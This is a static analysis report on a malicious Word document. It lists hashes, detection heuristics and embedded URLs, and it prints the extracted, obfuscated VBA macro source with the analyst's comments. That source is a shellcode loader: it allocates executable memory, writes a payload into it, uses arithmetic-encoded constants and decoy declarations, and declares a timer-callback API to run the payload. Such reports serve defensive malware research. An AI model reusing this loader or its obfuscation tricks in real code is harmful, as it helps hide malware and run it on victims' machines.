Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0763c6839423e687…

MALICIOUS

Office (OLE)

313.5 KB Created: 2017-11-21 13:11:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 94cbcda4655c7e5ec8acd2c72cf0adcd SHA-1: 74f7508e08cb7dce1a6a1f406bc84c36e0316e9a SHA-256: 0763c6839423e687b35e7a4bc8c006e233730e8633128a9753f806f89c573aea
Risk score: 82

Heuristics 3

  • Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER
    Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note that the ns.adobe.com, w3.org and schemas.openxmlformats.org entries below are XML namespace identifiers carried in embedded metadata, not endpoints the document contacts; only the eastoftheweb.com entry is a candidate network indicator.
    URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6601 bytes
SHA-256: ae990ab2d6f06f82402b627cf6e15fe22f737a2c96029645b8240d702749d22b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "portos"
' Module "portos": API declarations only, no procedures.
' Every procedure, variable and Declare name in this project is a random
' dictionary word; the real import is the string after Alias. The #If
' expressions are constant arithmetic joined with the Win64 compiler constant:
' "... < (Win64)" is the 64-bit Office branch (PtrSafe / LongPtr), the
' "And Not ..." form is the 32-bit branch. The comment lines between
' declarations are song lyrics used as filler (German lines translated here;
' the originals were mojibaked, repaired form given in brackets).
'  His passion is a kiss
'  Your love I can't dismiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  Don't die  [decoy lyric; original German: "Stirb nicht"]
'  Dont die before I do
' 64-bit: summary = ntdll!NtWriteVirtualMemory, the process-memory write
' primitive of the loader (see Function endowed). The library name "ntdll   "
' carries trailing spaces, presumably to defeat exact-string matching on the
' import; its 32-bit counterpart is declared in module mildran.
Public Declare PtrSafe Function summary _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal degeneration As Any, ByVal somatotropin As Any, ByVal caduceus As Any, ByVal monasticism As Any, ByVal amotion As Any) As LongPtr
'  I'm waiting here  [decoy lyric; original German: "Ich warte hier"]
'  I dont know who you are
' euphorbium = "GetOverlappedResult" declared against Shlwapi.dll. That API is
' a kernel32 export, not a Shlwapi one, and euphorbium is never referenced in
' the extracted source — presumably a decoy declaration; confirm against the
' full project.
Public Declare PtrSafe Function euphorbium Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal chipping As Any, gangrenous As Any, categorial As Any, aerodynamics As Any) As LongPtr
'  The night opens its lap  [decoy lyric; original German: "Die Nacht öffnet ihren Schoß"]
'  I cry quietly into time  [decoy lyric; original German: "Ich weine leise in die Zeit"]
#End If
'  The night opens its lap  [decoy lyric; original German: "Die Nacht öffnet ihren Schoß"]
'  It is cold and motionless  [decoy lyric; original German: "Es ist kalt und regungslos"]
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  I dont know who you are
' 32-bit: carelessly = the same "GetOverlappedResult"/Shlwapi.dll decoy as
' euphorbium above, with Long instead of LongPtr; also never referenced.
Public Declare Function carelessly Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal noahs As Any, fortunately As Any, denounce As Any, synchrocyclotron As Any) As Long
'  I dont know who he is
'  I know that someday  [decoy lyric; original German: "Ich weiß dass irgendwann"]
#End If
'  But I know that you exist  [decoy lyric; original German: "Doch ich weiß dass es dich gibt"]
'  I cry quietly into time  [decoy lyric; original German: "Ich weine leise in die Zeit"]

Function endowed(horrifyingly, flyfishing, obliteration)
' Thin wrapper around summary (ntdll!NtWriteVirtualMemory): copies
' obliteration bytes from address flyfishing to address horrifyingly inside
' the *current* process.
'   horrifyingly -> cenchrus            (BaseAddress, destination)
'   flyfishing   -> ephemerality        (Buffer, source)
'   obliteration -> uncommunicativeness (NumberOfBytesToWrite)
'   although     -> final ByRef slot    (never assigned; receives the
'                                        bytes-written count)
' The function never assigns its own return value, so callers get Empty; it is
' used purely for its side effect. Both callers are in Function eyelid.
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
' 64-bit locals (pointer-sized).
Dim rescription As LongPtr
Dim cenchrus As LongPtr
Dim although As LongPtr
Dim ephemerality As LongPtr
Dim uncommunicativeness As LongPtr
#End If
#If (44 - 40 + 396 + 120 - 65 + 245) > ((58 - 7 + 269) - (47 - 37 + 530) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
' 32-bit locals. The first comparison evaluates to 700 > -220 (always True);
' only the "Not ... < (Win64)" term selects the branch. expiable is unused.
Dim cenchrus As Long
Dim rescription As Long
Dim ephemerality As Long
Dim although As Long
Dim expiable As String
Dim uncommunicativeness As Long
#End If
cenchrus = horrifyingly
uncommunicativeness = obliteration
ephemerality = flyfishing
' chancroidal = 108; Pmt is the VBA financial "payment" function and its result
' is discarded — filler with no effect on the loader (presumably call-graph
' padding / heuristic noise).
chancroidal = 60 + 48
Pmt 0, chancroidal, 22143, 18381, 4
' Unused random value; filler.
adenoidal = Rnd(83)
' rescription = -1, passed ByVal in the ProcessHandle slot. -1 is the
' current-process pseudo-handle, so this is a self-write, not cross-process
' injection.
rescription = 35 - 74 + 38
summary ByVal rescription, cenchrus, ephemerality, uncommunicativeness, although
' Dead assignment; filler.
naja = "bever"
End Function

Function zambia()
' Builds and returns a 256-entry Byte lookup table indexed by character code.
' The populated values are the standard Base64 reverse alphabet:
'   'A'..'Z' (65..90)  -> 0..25      (bi(c) = c - 65)
'   '0'..'9' (48..57)  -> 52..61     (bi(c) = c + 4)
'   'a'..'z' (97..122) -> 26..51     (bi(c) = c - 71)
'   '/' (47)           -> 63
'   '+' (43)           -> 62
' Every constant is written as arithmetic to hide it: 16 - 86 + 135 = 65,
' 90 + 1 = 91, 50 + 8 = 58, 120 + 3 = 123, 60 + 2 = 62.
' Each loop bound is one past the real range (91, 58, 123), so the entries for
' '[', ':' and '{' are also written — harmless for valid Base64 input.
' zambia is not called anywhere in this preview; the decoder that consumes the
' table is presumably in a part of the project not shown here.
Dim bi(255) As Byte
coniferopsida = 16 - 86 + 135
Do While coniferopsida <= 90 + 1
bi(coniferopsida) = coniferopsida - 65
coniferopsida = coniferopsida + 1
Loop
coniferopsida = 48
Do While coniferopsida <= 50 + 8
bi(coniferopsida) = coniferopsida + 4
coniferopsida = coniferopsida + 1
Loop
coniferopsida = 97
Do While coniferopsida <= 120 + 3
bi(coniferopsida) = coniferopsida - 71
coniferopsida = coniferopsida + 1
Loop
' '/' -> 63 and '+' -> 62 complete the alphabet.
bi(47) = 63
coniferopsida = 43
bi(coniferopsida) = 60 + 2
zambia = bi
End Function

Attribute VB_Name = "mildran"
' Module "mildran": a second set of bitness-conditional declarations. The
' declarations are split across modules so that no single module shows both
' primitives: summary (NtWriteVirtualMemory) is declared here for 32-bit only
' and in module portos for 64-bit only; homocercal (NtAllocateVirtualMemory)
' is 64-bit here and 32-bit in module sideboard.
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' 64-bit: homocercal = ntdll!NtAllocateVirtualMemory, the memory allocation
' primitive used by Function eyelid. The parameter written
' "pandiculationByVal As LongPtr" is a single identifier (the ByVal keyword is
' fused into the name), so that slot is actually ByRef — an artefact of the
' name obfuscation, not an intentional calling convention.
Public Declare _
PtrSafe Function homocercal Lib "ntdll  " Alias _
"NtAllocateVirtualMemory" (mb As LongPtr, draped As LongPtr, ByVal halfhearted As LongPtr, pandiculationByVal As LongPtr, professionalism As LongPtr, ByVal meryta As LongPtr) As LongPtr
#ElseIf (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' 32-bit: summary = ntdll!NtWriteVirtualMemory with Long-sized arguments
' (same padded "ntdll   " library name as in module portos).
Public Declare Function summary Lib "ntdll   " Alias "NtWriteVirtualMemory" (ByVal ademption As Any, ByVal accredit As Any, ByVal transit As Any, ByVal absolved As Any, ByVal arma As Any) As Long
#End If

Function eyelid(kriegspiel)
' Core loader routine: allocates an executable region in the current process,
' copies a payload into it and returns the region's address. Constants are
' obfuscated arithmetic; their evaluated values are given in the comments.
'   1. architeuthis = pointer size (4 on the 32-bit branch, 8 on 64-bit).
'   2. endowed(...) copies architeuthis bytes from VarPtr(kriegspiel) + 8 into
'      cosmetologist, i.e. reads a pointer out of the Variant argument's data
'      field — presumably the address of the payload bytes (VARIANT layout
'      not verifiable from this listing).
'   3. homocercal = NtAllocateVirtualMemory(ProcessHandle = -1 (current
'      process), BaseAddress = homophonic (out, 0 = let the kernel choose),
'      ZeroBits = 0, RegionSize = 9357, AllocationType = 4096 (0x1000 =
'      MEM_COMMIT), Protect = 64 (0x40 = PAGE_EXECUTE_READWRITE)).
'   4. endowed(...) writes 5883 bytes from cosmetologist into the new region.
'   5. Returns homophonic, the RWX region address. No code in this preview
'      consumes the return value; the CreateTimerQueueTimer declaration in
'      module sideboard (clarinetist) is the obvious candidate for executing
'      it, but that call is not visible here.
' The RWX allocation + self-write pair is what the report's
' OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER heuristic keys on.
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
' 32-bit branch: architeuthis = 4.
Dim cosmetologist As Long
architeuthis = 44 - 59 + 19
Dim homophonic As Long
Dim philosophers As Long
#End If
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
' 64-bit branch: architeuthis = 8.
Dim cosmetologist As LongPtr
architeuthis = 6 - 68 + 70
Dim homophonic As LongPtr
Dim philosophers As LongPtr
#End If
' Read one pointer-sized value from the Variant argument into cosmetologist.
' polemonium is always Empty (endowed sets no return value) and is unused.
besieged = VarPtr(cosmetologist)
polemonium = endowed(besieged, VarPtr(kriegspiel) + 8, architeuthis)
' real = -1 (current-process pseudo-handle); homophonic = 0; mirror = 0;
' philosophers = 9357 (region size); droplet = 4096 (0x1000, MEM_COMMIT);
' disheartened = 64 (0x40, PAGE_EXECUTE_READWRITE).
real = 125 - 95 - 31
homophonic = 91 - 108 + 17
mirror = 40 - 120 + 80
philosophers = 86 - 108 + 9379
droplet = 29 - 117 + 4184
disheartened = 124 - 67 + 7
' homophonic receives the allocated base address; intermezzo (NTSTATUS) is
' never checked.
intermezzo = homocercal(ByVal real, _
homophonic, ByVal mirror, philosophers, ByVal droplet, _
ByVal disheartened)
' Copy 5883 bytes of payload from cosmetologist into the RWX region.
endowed homophonic, cosmetologist, 73 - 70 + 5880
' necrology = 76; Pmt result discarded — filler, same pattern as in endowed.
necrology = 44 + 32
Pmt 0, necrology, 32324, 46690, 8
eyelid = homophonic
End Function

Function atopognosia(nerodia, papyrus, caterpillar)
' Three-way arithmetic dispatcher. The Case expressions are constants:
'   48 + (10 / 2 - 5)     = 48 -> integer division  nerodia \ papyrus
'   58 + (5 - 3) / 2 - 1  = 58 -> And               nerodia And papyrus
'   66 + (56 / 7 - 4 * 2) = 66 -> multiplication    nerodia * papyrus
' 48, 58 and 66 are the character codes of "0", ":" and "B", so the selector
' is presumably a character taken from an encoded string. There is no Case
' Else: any other selector leaves the return value Empty. Not called anywhere
' in this preview.
Select Case caterpillar
Case 48 + (10 / 2 - 5)
atopognosia = nerodia \ papyrus
Case 58 + (5 - 3) / 2 - 1
atopognosia = nerodia And papyrus
Case 66 + (56 / 7 - 4 * 2)
atopognosia = nerodia * papyrus
End Select
End Function

Attribute VB_Name = "sideboard"
' Module "sideboard": declarations only. Holds the third element of the
' loader triad named in the report heuristic — CreateTimerQueueTimer
' (clarinetist), a callback-execution API — for both bitnesses, plus the
' 32-bit NtAllocateVirtualMemory and two more Shlwapi.dll decoys. No call to
' clarinetist appears anywhere in this preview. Here the 32-bit branch
' ("And Not") comes first and the 64-bit branch second.
'  It is cold and motionless  [decoy lyric; original German: "Es ist kalt und regungslos"]
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  The night opens its lap  [decoy lyric; original German: "Die Nacht öffnet ihren Schoß"]
'  I don't know what your name is  [decoy lyric; original German: "Ich weiß nicht wie du heißt"]
' 32-bit: clarinetist = Kernel32!CreateTimerQueueTimer (7 arguments, all As Any).
Public Declare Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (obstinate As Any, ByVal aminomethane As Any, ByVal defy As Any, ByVal elre As Any, ByVal nfor As Any, ByVal bise As Any, ByVal allophonic As Any) As Long
'  Sometimes love seems so far
'  Dont die before I do
' 32-bit: homocercal = ntdll!NtAllocateVirtualMemory (Long-sized). As in module
' mildran, "euphractusByVal As Long" is one fused identifier, so that slot is
' ByRef. Padded library name "ntdll  ".
Public Declare Function homocercal Lib _
"ntdll  " Alias _
"NtAllocateVirtualMemory" (hindustan As Long, angler As Long, ByVal dislikable As Long, euphractusByVal As Long, retribution As Long, ByVal arrogance As Long) As Long
'  I close my eyes and pass away
'  I dont know who you are
' sod = "SleepConditionVariableSRW" declared against Shlwapi.dll (a kernel32
' export); never referenced in the extracted source — presumably a decoy.
Public Declare Function sod Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal homespun As Any, decolonization As Any, audile As Any, drip As Any) As Long
'  I'm waiting here  [decoy lyric; original German: "Ich warte hier"]
'  someone loves me  [decoy lyric; original German: "irgendwer mich liebt"]
#End If
'  His passion is a kiss
'  Your love I can't dismiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  Don't die  [decoy lyric; original German: "Stirb nicht"]
'  No words are left to say
' 64-bit: planococcus = the same "SleepConditionVariableSRW"/Shlwapi.dll decoy
' as sod; never referenced.
Public Declare PtrSafe Function planococcus Lib "Shlwapi.dll  " _
Alias "SleepConditionVariableSRW" (ByVal cacation As Any, faciles As Any, diethylstilbestrol As Any, barbecuing As Any) As LongPtr
'  But I know that you exist  [decoy lyric; original German: "Doch ich weiß dass es dich gibt"]
'  I know that someday  [decoy lyric; original German: "Ich weiß dass irgendwann"]
' 64-bit: clarinetist = Kernel32!CreateTimerQueueTimer. Declared PtrSafe but
' with a Long (not LongPtr) return; the API returns a BOOL, so that is
' consistent.
Public Declare PtrSafe Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (aerography As Any, ByVal custacean As Any, ByVal shihtzu As Any, ByVal blastoderm As Any, ByVal bobble As Any, ByVal coadjutor As Any, ByVal phasianus As Any) As Long
'  I cry quietly into time  [decoy lyric; original German: "Ich weine leise in die Zeit"]
#End If





Attribute VB_Name = "unwelcome"
Attribute VB_Base = "0{BEDAA815-8A97-4A26-8D30-53369C8F0A8B}{09205486-3054-4B45-A06E-0137BB9F7141}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module "unwelcome": only the export header is present in this preview — no
' procedures follow it. VB_Base with two GUIDs, VB_PredeclaredId = True and
' VB_Exposed = False are the attributes of a document/class module rather than
' a standard module. The report's OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER
' heuristic states that the auto-exec entry was found in the raw project bytes
' but is absent from the extracted source; a document module like this is
' where such an entry (and the calls into eyelid / clarinetist that this
' listing never shows) would normally live — not verifiable from the preview.